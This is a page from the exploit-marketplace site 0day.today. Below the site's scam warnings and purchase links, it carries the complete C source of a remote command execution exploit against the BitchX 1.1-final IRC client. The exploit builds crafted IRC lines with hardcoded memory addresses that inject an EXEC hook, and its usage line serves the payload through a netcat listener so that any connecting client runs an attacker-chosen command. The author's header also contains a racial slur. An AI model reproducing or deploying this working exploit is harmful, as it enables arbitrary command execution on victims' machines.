0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BitchX 1.1-final (EXEC) Remote Command Execution Exploit
======================================================== BitchX 1.1-final (EXEC) Remote Command Execution Exploit ======================================================== /* Name: PBXS - Pointless BitchX Sploit * Author: clarity_ * Infected Versions: 1.1-final and others? * Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one * can inject data structures allowing for the remote execution of commands! * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx * version connects to the mischievous server "ps -aux" will be executed. * Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet */ // Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org #define HOOK_FUNCTIONS 0x81366e0 #define NICKNAME 0x8155353 #define STAR 0x8108f34 #include <stdio.h> #include <string.h> #include <stdlib.h> #define NICK_STR ":bleh!i" #define NICK_STR2 "@svun.powns.net NICK :" #define EXEC_STR "EXEC $1-" #define RAW_FMT_STR ":my_server -%u bleh :%s" typedef struct { unsigned int hook_functions, nickname, star; unsigned int base, diff, offset; } Addresses; /* Partial structs full struct w/ correct values found in include/struct.h */ // To be loaded into nickname static typedef struct { unsigned int name; // point to hook unsigned int list; // EXEC $1- 2 words } HookFunc; // To be loaded into joined_nick static typedef struct { // unsigned int next; /* struct hook_stru *next; */ unsigned int nick; /* char *nick; */ //star unsigned int stuff; /* char *stuff; */ unsigned int shit; } Hook; char * make_nickname(Addresses *addrs, int X, int Y) { char *tmp = NULL, *sp = NULL; int i; HookFunc h; Hook hk; // malloc tmp = (char *) malloc(1024); // BASE h.name = addrs->star; h.list = addrs->base - addrs->diff - 4; if (Y) { // start loading string if (X == 4) { strcpy(tmp, NICK_STR); } else { strcpy(tmp, ":"); strcat(tmp, make_nickname(addrs, X + 1, 0)); strcat(tmp, "!i"); } sp = tmp + strlen(tmp); // point to char after tmp //*sp++ = '0' + X; strcpy(sp, NICK_STR2); } else { sp = tmp; *tmp = '\0'; } hk.nick = addrs->star; hk.stuff = addrs->base + 8; // "stuff" is loaded after the nick // load str sp = tmp + strlen(tmp); // point to char after tmp memcpy(sp, &hk, sizeof(Hook)); sp += sizeof(Hook) - 4; if (X != 4) { while (X--) { *sp++ = 'X'; } *sp++ = '\0'; return tmp; } else { while (X--) { *sp++ = 'X'; } } // pad if (sizeof(Hook) > addrs->diff) { printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff); } for (i = sizeof(Hook); i < addrs->diff; ++i) *sp++ = 'x'; memcpy(sp, &h, sizeof(HookFunc)); sp += sizeof(HookFunc); memcpy(sp, EXEC_STR, strlen(EXEC_STR)); --sp[4]; sp += strlen(EXEC_STR); *++sp = '\0'; return tmp; } //#define RAW_FMT_STR ":my_server %d bleh :%s" char * make_raw(Addresses *addrs, char *cmd) { char *tmp = NULL; unsigned int len; len = 2000; // fix later tmp = (char *) malloc(len); sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd); return tmp; } int main(int argc, char **argv) { Addresses addrs; char *cmd = argv[1]; addrs.hook_functions = HOOK_FUNCTIONS; addrs.nickname = NICKNAME; addrs.star = STAR; addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1; addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20); addrs.base = NICKNAME + addrs.diff; printf(":my_server 001 bleh :a\n"); printf("%s\n", make_nickname(&addrs, 4, 1)); printf("%s\n", make_nickname(&addrs, 3, 1)); printf("%s\n", make_nickname(&addrs, 2, 1)); printf("%s\n", make_nickname(&addrs, 1, 1)); printf("%s\n", make_nickname(&addrs, 0, 1)); printf("%s\n", make_raw(&addrs, cmd)); return 0; } # 0day.today [2024-12-24] #